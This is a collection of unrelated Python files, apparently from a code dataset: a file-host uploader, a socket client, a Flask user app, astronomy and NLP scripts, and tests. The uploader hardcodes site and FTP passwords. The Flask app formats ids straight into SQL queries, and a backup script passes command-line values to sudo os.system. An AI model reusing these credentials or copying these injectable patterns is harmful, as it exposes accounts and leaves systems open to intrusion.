# inputElement_userName.clear()
# inputElement_userPassword.clear()
#
# inputElement_userName.send_keys('lxl001')
# inputElement_userPassword.send_keys('qQ2@wW')
#
# btn_login = driver.find_element_by_id("loginFormSubmit")
# btn_login.click()
#
#
# WebDriverWait(driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME, "dashboard_button")))
# return driver
#
# def download_file(self,url_inst):
# status = False #True表示程序已经成功开始下载文件
# db_session = create_session()
# db_session.add(url_inst)
# try:
# self.driver.get(url_inst.url)
# # time.sleep(3)
# # Msg = "开始下载文件:%s" % url_inst.url
# # wp_logging(Msg=Msg)
# status = True
# except Exception,e:
# Msg = '下载文件出错! 异常信息(%s);文章ID(%s);下载链接(%s) ' % (e, url_inst.article_id, url_inst.url)
# wp_logging(Msg=Msg)
# raise e
# db_session.close()
# return status
#
# def driver_quit(self):
# self.driver.quit()
#
# #todo 如果下载出现HTML文件,cooki过期,或者定义为每20分钟重新登录一次。
# common_utility.get_rared_files_name('/home/l/app/learning/wangpan/wp_resource/articles_file/1/rared_files/')
import subprocess, threading
class ShellCommand(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def run(self, timeout):
def target():
print 'Shell Thread started'
self.process = subprocess.Popen(self.cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = self.process.communicate()
print 'Shell Thread finished'
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print 'Terminating Shell process'
self.process.terminate()
return {'status': 'Time Out'}
s = self.process.returncode
# print s
#成功时,s==0
return {'status': s}
def check_stdout(self,str,out):
#可以判断返回信息包含哪些信息
import re
result = re.findall(str,out,re.MULTILINE)
if result:
return u'成功的out里找到str'
else:
return u'在out里面找不到str'
class FilmAvFtp():
def __init__(self,host='ftp.uploadable.ch',user='lxl001',password='f19174de',port=21,blocksize=8192,url_type=''):
# uploadable.ch, uploaded.net ryushare.com
self.blocksize = blocksize
self.total_size = 0
self.uploaded_size = 0
self.file_name = u''
if url_type == 'uploadable.ch':
self.host = host
self.user = user
self.password = password
self.port = port
self.ftp=FTP(self.host)
elif url_type == 'uploaded.net':
self.host = 'ftp.uploaded.net'
self.user = '12917027'
self.password = '123qwe'
self.port = port
self.ftp=FTP(self.host)
elif url_type == 'ryushare.com':
self.host = 'ftp.ryushare.com'
self.user = 'nlxl001'
self.password = 'fhnmmw3e10'
self.port = port
self.ftp=FTP(self.host)
def login(self):
self.ftp.login(user=self.user, passwd=self.password)
# def handle(self):
#
# pass
#
# def upload_list(self,full_path_file_names):
#
# for full_path_file_name in full_path_file_names:
# file_name = os.path.basename(full_path_file_name)
# with open(full_path_file_name,'rb') as f:
# try:
# myFtp.ftp.storbinary('STOR ' + file_name,
# f,
# self.blocksize,
# self.callback_handle(file_name))
# except ftplib.error_perm :
# print "上传失败!"
# print "%s 上传成功。" % file_name
#
# def upload(self,full_path_file_name):
# new_ftp = MyFtp()
# new_ftp.login()
#
# file_name = os.path.basename(full_path_file_name)
# with open(full_path_file_name,'rb') as f:
# try:
# new_ftp.ftp.storbinary('STOR ' + file_name,
# f,
# self.blocksize,
# self.callback_handle(file_name))
#
# except ftplib.error_perm :
# print "上传失败!"
# print "%s 上传成功。" % file_name
#
# def callback_handle(self,file_name):
# print "%s 上传中..." % file_name
# 测试
# file_path = '/home/l/app/learning/wangpan/wp_resource/articles_file/1/downloaded_files/chrome.part4.rar'
#
# dir = '/home/l/app/learning/wangpan/wp_resource/articles_file/1/unrared_files'
#
# cmd = '/usr/bin/unrar x ' + file_path +' ' + dir
#
# command = ShellCommand(cmd)
# # command.run(timeout=10)
# # command.run(timeout=1)
#
#
# thread = threading.Thread(target=command.run,kwargs={'timeout':3})
# thread.setDaemon(True)
# thread.start()
# print 'a'
# time.sleep(1)
# print '1'
# thread.join(2)
# print '2'
|
21,555 | 77401655f8388629614da367289268edc873a14a | import sys
sys.path.append(".")
import survae
from jax import numpy as jnp, random
import jax
rng = random.PRNGKey(4)
rng, key = random.split(rng)
m = survae.rvs(rng,4)
print(m)
print(m.dot(m.T)) |
21,556 | 86dd59813e028e18d1dbb96071aed9ef03bdb469 | # -*- coding: utf-8 -*-
#author:ZJW
import json
#import jks
import ssl
import struct
import time
import socket
import select
import types
import thread
import threading
import UtilFunc
import Log
from constant import *
# from OpenSSL import SSL
# from OpenSSL.crypto import load_pkcs12,FILETYPE_ASN1,load_certificate,load_privatekey
#
#
# def jksfile2context(jksfile, passphrase, certfile):
# keystore = jks.KeyStore.load(jksfile, passphrase)
# p12 = load_pkcs12(file(certfile, 'rb').read(), passphrase)
# trusted_certs = [load_certificate(FILETYPE_ASN1, cert.cert)
# for cert in keystore.certs]
# ctx = SSL.Context(SSL.TLSv1_METHOD)
# ctx.set_options(SSL.OP_NO_TLSv1)
# ctx.use_privatekey(p12.get_privatekey())
# ctx.use_certificate(p12.get_certificate())
# ctx.check_privatekey()
# # for ca in p12.get_ca_certificates():
# # ctx.add_client_ca(ca)
# for cert in trusted_certs:
# ctx.get_cert_store().add_cert(cert)
# return ctx
#
# def verify_cb(conn, cert, errnum, depth, ok):
# # This obviously has to be updated
# print 'Got certificate: %s' % cert.get_subject()
# return ok
class NetTunnel:
def __init__(self):
self.name = 'NetTunnel'
self._stop = True
self.msglist = []
self.connectTime = None
self.pingCode = HPING
self.errCode = TIMEOUT
self.mutex = threading.Lock()
self.methods = {}
def _onConnectDown(self, retry=True):
if self._stop: return
self.stop()
if retry:
Log.info('[%s]Server Connection Disconnect! ReTry 10s Later!'%self.name)
time.sleep(10)
thread.start_new_thread(self.connect,(self.host, self.port, {}, True))
def _onAccept(self,msg):
Log.info('[%s]Server Connect Successfull!'%self.name)
def _onPingAck(self, msg):
self.connectTime = time.time()
def _packMessage(self, body=None, msgType=None, uid=None):
buf = struct.pack(FORMAT_H, MAGICCODE[self.name])
if msgType:
buf += struct.pack(FORMAT_H, msgType)
if body:
if not isinstance(body,types.StringType):
body = json.dumps(body)
body_length = len(body)
if uid:
buf += struct.pack(FORMAT_I, body_length + UIDLEN)
buf += struct.pack(FORMAT_Q, uid)
else:
buf += struct.pack(FORMAT_I, body_length)
buf += struct.pack(FORMAT_S%body_length, body)
else:
buf += struct.pack(FORMAT_I, 0)
return buf
def _checkMagicCode(self, msg):
(code,) = struct.unpack(FORMAT_H, msg[:MAGICLEN])
if code == self.magicCode:
return True
Log.error("[%s]Receive Message Failed! MagicCode Error!"%self.name)
return False
def _revData(self, length):
data, buff_len = '', 0
if length != 0:
while buff_len < length:
sub_data = self.conn.recv(length - buff_len)
data += sub_data
buff_len = len(data)
return data
def _onLine(self, params):
return {}
def connect(self, host, port, params={}, retry=False, key=None, cert=None):
Log.info('[%s]Server Connecting! HOST[%s] PORT[%s]'%(self.name, host, port))
try:
self.host, self.port = host, port
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if key and cert:
self.key, self.cert = key, cert
p12 = load_pkcs12(file(key, 'rb').read(), 'elastos')
ctx = SSL.Context(SSL.TLSv1_METHOD)
ctx.set_verify(SSL.VERIFY_PEER, verify_cb)
ctx.use_privatekey(p12.get_privatekey())
ctx.use_certificate(p12.get_certificate())
ctx.load_verify_locations(self.cert)
# ctx = jksfile2context(self.key,'elastos',self.cert)
self.conn = SSL.Connection(ctx, conn)
self.conn.set_connect_state()
self.conn.settimeout(90)
else:
self.conn = conn
self.conn.connect((host, port))
self.conn.send(self._packMessage(self._onLine(params), CONNECT))
msg = self.conn.recv(MESSAGEBUF)
if self._checkMagicCode(msg[:MAGICLEN]):
(msgType, length) = struct.unpack(FORMAT_R, msg[MAGICLEN:(LENGTH_R+MAGICLEN)])
if msgType:
if msgType == ACCEPT:
self.connectTime = time.time()
self.host = host
thread.start_new_thread(self._listening, ())
thread.start_new_thread(self._loop, ())
self._stop = False
self._onAccept(msg[(LENGTH_R+MAGICLEN):])
return True
elif msgType == REFUSE:
(errCode,info) = self.parseData(msg[(LENGTH_R+MAGICLEN):], ('reason','message'))
Log.error('[%s]Connect Refuse! ErrCode[%s] Info[%s]'%(self.name,errCode,info))
self.errCode = errCode
else:
Log.error('[%s]Create Connection Failed! Receive Type Error!'%self.name)
else:
Log.error('[%s]Create Connection Failed! Receive Message Error!'%self.name)
except Exception,e:
Log.exception('[%s]Connect Server[%s] Exception[%s]'%(self.name,host,e))
self._stop = True
if self.conn: self.conn.close()
if retry:
Log.info('[%s]Server Connect Failed! ReTry 10s Later!'%self.name)
time.sleep(10)
self.connect(host, port, params, retry, key, cert)
return False
def receive(self, msgType, msg):
Log.info('[%s]Receive Message From Server! msgType:[%s]'%(self.name,msgType))
try:
method = self.methods.get(msgType,None)
if method:
self.connectTime = time.time()
exec('self.%s(msg)'%method)
except Exception,e:
Log.exception('[%s]Receive Exception! Reason[%s]'%(self.name,e))
return
def send(self, msg=None, msgType=None, uid=None):
if self.isStop():
if msgType in [RPING,HPING]: return
self.msglist.append({'msg':msg,'type':msgType,'uuid':uid})
return
buf = self._packMessage(msg, msgType, uid)
start, end = 0, len(buf)
self.mutex.acquire()
try:
while start < end:
length = self.conn.send(buf[start:])
start += length
Log.info('[%s]Send Message To Server! type[%s] time[%s]'%(self.name,msgType, UtilFunc.getUtcTime()))
except socket.error, e:
Log.error('[%s]Server Connection Error! Reason[%s]'%(self.name,e))
self._onConnectDown()
except Exception, e:
Log.info('[%s]SendMessage To Server Except! Reason[%s]'%(self.name,e))
finally:
self.mutex.release()
def stop(self):
self._stop = True
if self.conn: self.conn.close()
def isStop(self):
return self._stop
def parseData(self, msg, keys=[]):
(msg,) = struct.unpack(FORMAT_S%len(msg), msg)
bodyData = json.loads(msg)
if keys:
ret = []
for key in keys:
ret.append(bodyData.get(key,''))
return tuple(ret)
else:
return bodyData
def _listening(self):
while not self._stop:
try:
Input, Output, Exception=select.select([self.conn,],[],[self.conn,])
if Exception:
for s in Exception:
if s == self.conn:
Log.exception("Connect[%s] Exception"%s.getpeername())
break
for indata in Input:
if indata == self.conn:
magicData = self._revData(MAGICLEN)
if not magicData or not self._checkMagicCode(magicData):
continue
buf = self._revData(LENGTH_R)
(msgType, length) = struct.unpack(FORMAT_R, buf)
data = self._revData(length)
self.receive(msgType, data)
for msg in self.msglist:
self.send(msg.get('msg',None),msg.get('type',None),msg.get('uuid',None))
self.msglist.remove(msg)
except socket.error, e:
Log.exception('Listenning Except! Server[%s], Reason[%s]'%(self.name,e))
break
if not self._stop:
self._onConnectDown()
def _loop(self, delay = PINGDELAY):
start = time.time()
while not self._stop:
if time.time() - start >= delay:
self.send(None, self.pingCode)
start = time.time()
if time.time() - self.connectTime > CDELAY:
self._onConnectDown()
time.sleep(0.1)
|
21,557 | 004dd7775d681706ca50add7dbc368ff01bf1afa | from django.http import HttpResponse
from django.shortcuts import render
from upload_image.models import Image
# Create your views here.
def index(request):
if request.method == 'GET':
return render(request, 'upload_image/index.html', locals())
if request.method == 'POST':
username = request.session['username']
afile = request.FILES['myfile']
Image.objects.create(username=username, myfile=afile)
# return render(request, 'upload_image/index.html', locals())
return HttpResponse('上传成功')
|
21,558 | a89ef8b097ce86cf59a6b0fe46ae320809c41635 | from astropy.io import ascii
from scripts.ingests.utils import *
from specutils import Spectrum1D
import astropy.units as u
from datetime import date
logger.setLevel(logging.DEBUG)
db = load_simpledb('SIMPLE.db', recreatedb=False)
data = db.inventory('2MASS J13571237+1428398',pretty_print= True)
date = date.today()
table = db.query(db.Spectra).table()
#print(table.info)
wcs1d_fits_tally = 0
spex_prism_tally = 0
iraf_tally = 0
tabularfits_tally = 0
fits_units = 0
spex_units = 0
ascii_tally = 0
not_working_tally =0
not_working_errors = [] #prints out the errors for the ones that don't work that dont work
not_working_spectra = []
not_working_names =[]
not_working_txt = []
txt_names=[]
txt_references =[]
wcs1d_fits_spectra = []
wcs1d_fits_units_issue = []
wcs1d_fits_names = []
units_issue_names =[]
spex_prism_spectra = []
spex_prism_names= []
#ASCII, iraf, tabular-fits, wcs1d-fits, Spex Prism, ecsv
for n ,spectrum in enumerate(table):
file = os.path.basename(spectrum['spectrum'])
file_root = os.path.splitext(file)[1]
length = len(table)
#print(n,spectrum[0])
try:
spec = Spectrum1D.read(spectrum['spectrum'], format = 'wcs1d-fits')
wcs1d_fits_tally +=1
wcs1d_fits_spectra.append(spectrum['spectrum'])
wcs1d_fits_names.append(spectrum['source'])
try:
spec.wavelength.to(u.micron).value
except:
fits_units += 1
wcs1d_fits_units_issue.append(spectrum['spectrum'])
units_issue_names.append(spectrum['source'])
except Exception as e_wcs1d:
not_working_errors.append(f'wcs1d err: {e_wcs1d} \n') # this does not work -
try:
spec = Spectrum1D.read(spectrum['spectrum'], format = 'Spex Prism')
spex_prism_tally += 1
spex_prism_spectra.append(spectrum['spectrum'])
spex_prism_names.append(spectrum['source'])
try:
spec.wavelength.to(u.micron).value
except:
spex_units += 1
except Exception as e_spex:
not_working_errors.append(f'spex prism err: {e_spex} \n')
try:
spec = Spectrum1D.read(spectrum['spectrum'], format = 'iraf')
iraf_tally += 1
except Exception as e_iraf:
try:
spec = Spectrum1D.read(spectrum['spectrum'], format = 'tabular-fits')
tabularfits_tally += 1
except Exception as e_tabular:
try:
spec = Spectrum1D.read(spectrum['spectrum'], format = 'ASCII')
ascii_tally += 1
except Exception as e_ascii:
not_working_errors.append(f'ascii err: {e_ascii} \n')
not_working_spectra.append(spectrum['spectrum'])
not_working_names.append(spectrum['source'])
not_working_tally += 1
if file_root == '.txt':
not_working_txt.append(spectrum['spectrum'])
txt_names.append(spectrum['source'])
txt_references.append(spectrum['reference'])
print(f'wcs1d fits tally: {wcs1d_fits_tally}')
print(f'fits units broken: {fits_units}')
print(f'spex prism tally: {spex_prism_tally}')
print(f'spex units broken: {spex_units}')
print(f'iraf tally: {iraf_tally}')
print(f'tabularfits tally: {tabularfits_tally}')
print(f'ascii tally: {ascii_tally}')
print(f'not_working_tally: {not_working_tally}')
print(f'number of spectra in database: {length}')
print(f'total tally:{wcs1d_fits_tally + spex_prism_tally + iraf_tally + tabularfits_tally +ascii_tally +not_working_tally}')
#table for all not wokring spectra
data_not_working = Table([not_working_names,not_working_spectra],
names=('source','spectrum')) #add column names source and url
ascii.write(data_not_working, f'not_working_table_{date}.dat', overwrite=False)
#table for not wokring .txt spectra
data_not_working_txt = Table([txt_names, not_working_txt, txt_references],
names=('source','spectrum','reference'))
ascii.write(data_not_working_txt, f'not_working_txt_table_{date}.dat', overwrite=False)
#table for wcs1d-fits spectra
data = Table([wcs1d_fits_names,wcs1d_fits_spectra],
names=('source','spectrum'))
ascii.write(data, f'wcs1d_spectrum_table_{date}.dat', overwrite=False)
#table for wcs1d spectra w units errors
units_data = Table([units_issue_names, wcs1d_fits_units_issue],
names=('source','spectrum'))
ascii.write(units_data, f'wcs1d_convert_unit_table_{date}.dat', overwrite=False)
#table for spex prism spectra
spex_data = Table([spex_prism_names, spex_prism_spectra],
names=('source','spectrum'))
ascii.write(spex_data, f'spex_prism_table_{date}.dat', overwrite=False)
#plt.plot(spec.wavelength, spec.flux)
#plt.show()
|
21,559 | 6ea7ef09a94decd51abd80c1de294849d286c124 | import os
import re
import csv
import time
from os import sys
from sys import platform
import zipfile
if not platform == "linux" and not platform == "linux2":
print('This script only works on Linux systems')
quit()
if not len(sys.argv) == 3:
print('Specify at least one parameter. $python script.py example.com standartdomainname.com')
quit()
else:
domainname = sys.argv[1]
standartdomainname = sys.argv[2]
if not os.path.isdir('/var/www/' + domainname):
print('This domain does not exist')
quit()
zip_name = 'backup_' + domainname + '_' + time.strftime('%Y_%m_%d_%H_%M_%S') + '_manually.zip'
Zip = zipfile.ZipFile('/var/tmp/' + zip_name, 'a')
counter = 0
for dirname,dirs,filenames in os.walk('/var/www/' + domainname + '/httpd'):
for filename in filenames:
counter = counter + counter
Zip.write(os.path.join(dirname,filename))
Zip.close()
os.system('sudo mv /var/tmp/' + zip_name + ' /var/www/config.' + standartdomainname + '/httpd/backups/' + zip_name)
print(zip_name)
|
21,560 | de36e7e3beb29388d149a3b3b84406977ab064f0 |
# import urllib.request
# url="http://www.amazon.com/s?i=alexa-skills&bbn=13727921011&rh=n%3A13727921011%2Cp_n_date%3A14284927011&page=2&qid=1601731757&ref=sr_pg_3";
# opener.addheaders = [('User-agent', 'Mozilla/5.0')]
# uf = urllib.request.urlopen(url);
# html = uf.read();
# print (html);
# import requests
# headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'};
# page = requests.get("https://www.amazon.com/s?i=alexa-skills&bbn=13727921011&rh=n%3A13727921011%2Cp_n_date%3A14284927011&page=2&qid=1601731757&ref=sr_pg_3",headers)
# html_contents = page.text
# print(html_contents)
# import urllib
# opener = urllib.request.urlopen();
# opener.addheaders = [('User-agent', 'Mozilla/81.0.1')]
# response = opener.open('https://www.amazon.com/s?i=alexa-skills&bbn=13727921011&rh=n%3A13727921011%2Cp_n_date%3A14284927011&page=2&qid=1601731757&ref=sr_pg_3')
# html_contents = response.read()
import tensorflow_hub as hub
import tensorflow as tf
from nltk.corpus import wordnet as wn
import numpy as np
from sklearn.neighbors import BallTree
import matplotlib.pyplot as plt
def GUSE(item):
# return embed([item]).numpy().tolist();
return embed([item]).numpy();
def embed(newSteps):
tempEmbeeding=[];
for item in newSteps:
item=item.lower();
tempembed=GUSE(item);
tempEmbeeding.append(tempembed);
# tempembed=GUSE(item);
# tempEmbeeding.append(tempembed);
# trueEmbeedingArrayBig=np.append(trueEmbeedingArrayBig,tempembed);
return tempEmbeeding;
# def compare(input_From_User_Embedding,trueEmbeedingArrayBig):
# size=len(trueEmbeedingArrayBig)/512;
# resizedEmbedding=np.reshape(trueEmbeedingArrayBig,(int(size),512));
# tree = BallTree(resizedEmbedding, leaf_size=20) # doctest: +SKIP
# dist, ind = tree.query(input_From_User_Embedding, k=5)
# print(dist);
def compare(input_From_User_Embedding,trueEmbeedingArrayBig):
size=len(trueEmbeedingArrayBig);
# print(size);
# resizedEmbedding=np.reshape(trueEmbeedingArrayBig,(int(size),512));
# print(trueEmbeedingArrayBig);
resizedEmbedding=np.reshape(trueEmbeedingArrayBig,(int(size),512));
# print(len(resizedEmbedding));
tree = BallTree(resizedEmbedding, leaf_size=20) # doctest: +SKIP
dist, ind = tree.query(input_From_User_Embedding, k=10)
indexs=[];
for i in range(len(dist[0])):
if dist[0][i]>0.8:
indexs.append(ind[0][i]);
# print(dist);
# print(ind);
# print(indexs)
return indexs;
def bert():
print('1');
max_seq_length = 128 # Your choice here.
input_word_ids = tf.keras.layers.Input(shape=(max_seq_length,), dtype=tf.int32,name="input_word_ids")
input_mask = tf.keras.layers.Input(shape=(max_seq_length,), dtype=tf.int32, name="input_mask")
segment_ids = tf.keras.layers.Input(shape=(max_seq_length,), dtype=tf.int32, name="segment_ids")
# bert_layer = hub.KerasLayer("https://tfhub.dev/tensorflow/bert_en_uncased_L-24_H-1024_A-16/2",trainable=True)
print('2');
bert_layer = hub.KerasLayer("/Users/senqiao/Desktop/533Project/bert_en_uncased_L-24_H-1024_A-16_2",trainable=True)
print('3');
pooled_output, sequence_output = bert_layer([input_word_ids, input_mask, segment_ids])
print(pooled_output);
Name_List=[];
Rating_List=[];
Avaiability_List=[];
Language_List=[];
Description_List=[];
# 100 page of featured
filename="ListofSkills.txt"
with open(filename, newline='') as Listfile:
count=0;
for line in Listfile:
if line !='\n' and line!= 'Free Download\n':
if count==0:
Name_List.append(line);
elif count==2 and 'Available' not in line:
Rating_List.append(line);
elif count==2 and 'Available' in line:
Rating_List.append('');
Avaiability_List.append(line);
count=count+1;
elif count==3:
Avaiability_List.append(line);
elif count==4:
Language_List.append(line);
elif count==5:
Description_List.append(line);
count=-1;
count=count+1;
####################################################
# compare names
unique={};
unique_array=[];
for i in Name_List:
# if 'Jeopardy' in i:
# print (i);
if i.replace('\n','').replace('!','').replace('.','').replace('(','').replace(')','') not in unique_array:
unique_array.append(i.replace('\n','').replace('!','').replace('.','').replace('(','').replace(')',''))
unique[i]=1;
else:
unique[i]=unique[i]+1;
print({k: v for k, v in sorted(unique.items(), key=lambda item: item[1])});
#####################################Graph bar
# fig = plt.figure()
# count = [];
# names = [];
# for k, v in unique.items():
# count.append(k);
# names.append(int(v));
# ax = fig.add_axes([0,0,1,1])
# ax.set_ylabel('Count');
# ax.set_xlabel('Unique Skill Names');
# ax.set_ylim(0, 25)
# ax.bar(count,names)
# plt.show()
#####################################################
# Google Universeral Encoder
# embed = hub.load("/universal-sentence-encoder_4/");
embed = hub.load("https://tfhub.dev/google/universal-sentence-encoder/1");
embed_array=embed(unique_array);
covert_embed=[];
for i in embed_array:
covert_embed.append(i.numpy());
for j in range(len(covert_embed)):
# print("ssssss1");
print('Orginal Skill Name:');
print(unique_array[j]);
# unique_array
appendme=[];
appendme.append(covert_embed[j]);
index=compare(appendme,covert_embed);
Similar_array=[];
for i in index:
# print(i[1]);
Similar_array.append(unique_array[i]);
print('Similar Skills:');
print(Similar_array);
################################################
# bert();
# unique_array=["Jeopardy Unofficial","Jeopardy"];
# embed = hub.load("/Users/senqiao/Desktop/Recomandation/universal-sentence-encoder_4/");
# embed_array=embed(unique_array);
# covert_embed=[];
# for i in embed_array:
# covert_embed.append(i.numpy());
# for j in range(len(covert_embed)):
# # print("ssssss1");
# print('Orginal:');
# print(unique_array[j]);
# # unique_array
# appendme=[];
# appendme.append(covert_embed[j]);
# index=compare(appendme,covert_embed);
# Similar_array=[];
# for i in index:
# # print(i[1]);
# Similar_array.append(unique_array[i]);
# print('Similar:');
# print(Similar_array);
|
21,561 | 159e4abcd3d3fa36a2850662f6114b721888f98d | import hashlib
import PySimpleGUI as sg
import os
import re
def hash(fname, method):
if method == 'SHA1':
hash = hashlib.sha1()
elif method == 'MD5':
hash = hashlib.md5()
elif method == 'SHA256':
hash = hashlib.sha256()
with open(fname) as handle:
for line in handle:
hash.update(line.encode(encoding = 'utf-8'))
return(hash.hexdigest())
sg.change_look_and_feel('LightBlue3')
layout = [
[sg.Text('File 1: '),
sg.InputText(),
sg.FileBrowse(),
sg.Checkbox('SHA1'),
sg.Checkbox('MD5')],
[sg.Text('File 2: '),
sg.InputText(),
sg.FileBrowse(),
sg.Checkbox('SHA256')],
[sg.Output(size=(80,20))],
[sg.Submit(), sg.Cancel()]
]
window = sg.Window('Compare Files', layout)
while True:
event, values = window.read()
if event in (None, 'Exit', 'Cancel'):
break
if event=='Submit':
# print(event, values)
filepaths = []
methods = []
file1 = None
file2 = None
valid = None
if values[0] and values[3]:
# print(values[0])
# print(values[3])
file1 = re.findall('\/.+\.+.', values[0])
file2 = re.findall('\/.+\.+.', values[3])
valid = 1
if (not file1 and file1 is not None) or not os.path.isfile(values[0]):
print('Error: Invalid filepath for File 1')
valid = 0
elif (not file2 and file2 is not None) or not os.path.isfile(values[3]):
print('Error: Invalid filepath for File 2')
valid = 0
elif not (values[1] or values[2] or values[4]):
print('Error: No algorithm selected')
valid = 0
elif valid == 1:
print('Info: Valid paths entered')
if values[1]:
methods.append('SHA1')
if values[2]:
methods.append('MD5')
if values[4]:
methods.append('SHA256')
filepaths.append(values[0]) # File 1
filepaths.append(values[3]) # File 2
# print(methods)
# print(filepaths)
for method in methods:
print(f'>> {method} Comparison')
print(f'Hash of File 1 is {hash(filepaths[0], method)}')
print(f'Hash of File 2 is {hash(filepaths[1], method)}')
if hash(filepaths[0], method) == hash(filepaths[1], method):
print(f'The two files are identical relying on {method} method\n')
else:
print(f'The two files are different relying on {method} method\n')
else:
print('Error: Please choose 2 files') |
21,562 | e7b6ca2caaa9cb74061b95a1991662bffe460a51 | from flask import Flask, render_template, request, redirect
from mysqlconnection import MySQLConnection
app = Flask(__name__)
mysql = MySQLConnection(app, 'users')
@app.route('/')
def redirect_root():
return redirect('/users')
@app.route('/users')
def index():
query = mysql.query_db("SELECT id, concat(first_name, ' ', last_name) as full_name, email, DATE_FORMAT(created_at, '%M %D, %Y') AS created_at FROM users")
return render_template('index.html', query=query)
@app.route('/users/new')
def new():
return render_template('users_new.html')
@app.route('/users/<id>/edit')
def edit(id):
query = mysql.query_db("SELECT * FROM users WHERE id='{}'".format(id))
return render_template('users_edit.html', id=id, query=query)
@app.route('/users/<id>', methods=['GET'])
def show(id):
query = mysql.query_db("SELECT concat(first_name, ' ', last_name) as full_name, email, DATE_FORMAT(created_at, '%M %D, %Y') AS created_at FROM users WHERE id='{}'".format(id))
return render_template('users_show.html', id=id, query=query)
@app.route('/users/<id>', methods=['POST'])
def update(id):
return redirect('/users/{}}'.format(id))
@app.route('/users/create', methods=['POST'])
def create():
query = "INSERT INTO users (first_name, last_name, email, created_at, updated_at) VALUES (:first_name, :last_name, :email, NOW(), NOW())"
data = {
'first_name': request.form['first_name'],
'last_name': request.form['last_name'],
'email': request.form['email']
}
mysql.query_db(query, data)
id_result = mysql.query_db("SELECT id FROM users WHERE email='{}'".format(request.form['email']))
return redirect('/users/{}'.format(id_result[0]['id']))
@app.route('/users/<id>/destroy')
def destroy(id):
mysql.query_db("DELETE FROM users WHERE id='{}'".format(id))
return redirect('/users')
app.run(debug=True)
|
21,563 | 38554405b7c13cd303ddd5e4f6d62a68dcdf8a8a | from PyQt5.QtWidgets import QTextBrowser
from PyQt5.QtGui import QFont
class Browser(QTextBrowser):
def __init__(self):
super(Browser, self).__init__()
font = QFont('Consolas', 11) # 设置窗口字体格式
font.setFixedPitch(True)
self.setFont(font)
# 设置背景颜色与字体颜色
self.setStyleSheet(
'background-color: rgb(49, 48, 42);'
'color: rgb(235, 229, 209);'
)
|
21,564 | 92fb0d78f519d3a000f64cf43de85a1317e2a099 | import pytest
import profile_viewer as pv
def test_standard_deviation():
assert pv.standard_deviation([0]) == 0
assert pv.standard_deviation([1,0]) == 0.5 |
21,565 | 07d0d0dfa503395553258d5f5b127578b626735f | """Tests for Day 22 Puzzle"""
import unittest
import rpg
import strategy
class TestPuzzle22(unittest.TestCase):
"""Test for Day 22 Puzzle"""
def test_simulate_combat(self):
"""Tests for simulate_combat()"""
rpg.VERBOSE = False
if rpg.VERBOSE:
print "*" * 30, 'Battle #1', "*" * 30
player = rpg.Character('Player', hit_points=10, mana=250)
boss = rpg.Character('Boss', hit_points=13, damage=8)
spell_list = strategy.SpellList(['Poison', 'Magic Missile'])
result = rpg.simulate_combat(player, boss, spell_list, {})
# Player has 2 hit points, 0 armor, 24 mana
self.assertEquals(player.hit_points, 2)
self.assertEquals(player.armor, 0)
self.assertEquals(player.mana, 24)
# This kills the boss, and the player wins.
self.assertTrue(boss.is_dead())
self.assertFalse(player.is_dead())
self.assertEquals(result, 1)
if rpg.VERBOSE:
print "*" * 30, 'Battle #2', "*" * 30
player = rpg.Character('Player', hit_points=10, mana=250)
boss = rpg.Character('Boss', hit_points=14, damage=8)
spell_list = strategy.SpellList(['Recharge', 'Shield', 'Drain',
'Poison', 'Magic Missile'])
effects = {}
result = rpg.simulate_combat(player, boss, spell_list, effects)
self.assertEquals(result, 1)
def test_simulate_combat_round(self):
"""Tests simulate_combat_round()"""
rpg.VERBOSE = False
player = rpg.Character('Player', hit_points=10, mana=250)
boss = rpg.Character('Boss', hit_points=13, damage=8)
effects = {}
if rpg.VERBOSE:
print "*" * 80
# Player has 10 hit points, 0 armor, 250 mana
self.assertEquals(player.hit_points, 10)
self.assertEquals(player.armor, 0)
self.assertEquals(player.mana, 250)
# Boss has 13 hit points
self.assertEquals(boss.hit_points, 13)
rpg.simulate_combat_round(player, boss, effects, 'Poison')
# Player has 2 hit points, 0 armor, 77 mana
self.assertEquals(player.hit_points, 2)
self.assertEquals(player.armor, 0)
self.assertEquals(player.mana, 77)
# Boss has 10 hit points
self.assertEquals(boss.hit_points, 10)
# Poison timer is now 4.
self.assertEquals(effects['Poison'], 5)
# Player casts Magic Missile
rpg.simulate_combat_round(player, boss, effects, 'Magic Missile')
# Player has 2 hit points, 0 armor, 24 mana
self.assertEquals(player.hit_points, 2)
self.assertEquals(player.armor, 0)
self.assertEquals(player.mana, 24)
# Poison its timer is now 3
self.assertEquals(effects['Poison'], 3)
# This kills the boss, and the player wins.
self.assertTrue(boss.is_dead())
self.assertFalse(player.is_dead())
if __name__ == "__main__":
unittest.main()
|
21,566 | 12820cfa62f9d7e7311ae1fff5e4a6d6bc56c1ab | import logging
import nig
import numpy as np
import os
import tensorflow as tf
from collections import OrderedDict
from functools import partial
from nig.data import loaders
from experiment.nig import experiments
__author__ = 'eaplatanios'
logger = logging.getLogger(__name__)
class RCV1V2Experiment(experiments.ExperimentBase):
def __init__(self, data_subsets, architectures, activation=tf.nn.relu,
labeled_batch_size=100, unlabeled_batch_size=100,
test_data_proportion=0.1, max_iter=1000, abs_loss_chg_tol=1e-6,
rel_loss_chg_tol=1e-6, loss_chg_iter_below_tol=5,
logging_frequency=10, summary_frequency=100,
checkpoint_frequency=1000, evaluation_frequency=10,
variable_statistics_frequency=-1, run_meta_data_frequency=-1,
working_dir=os.path.join(os.getcwd(), 'working'),
checkpoint_file_prefix='ckpt', restore_sequentially=False,
save_trained=True, optimizer=lambda: tf.train.AdamOptimizer(),
gradients_processor=None):
if isinstance(data_subsets, int):
data_subsets = [data_subsets]
self.data_subsets = data_subsets
self.architectures = architectures
# self.loss = nig.L2Loss()
self.loss = nig.BinaryCrossEntropy(
logit_outputs=False, one_hot_train_outputs=True)
optimizer_opts = {
'batch_size': labeled_batch_size,
'max_iter': max_iter,
'abs_loss_chg_tol': abs_loss_chg_tol,
'rel_loss_chg_tol': rel_loss_chg_tol,
'loss_chg_iter_below_tol': loss_chg_iter_below_tol,
'grads_processor': gradients_processor}
dataset_info = loaders.mulan.dataset_info['rcv1v2']
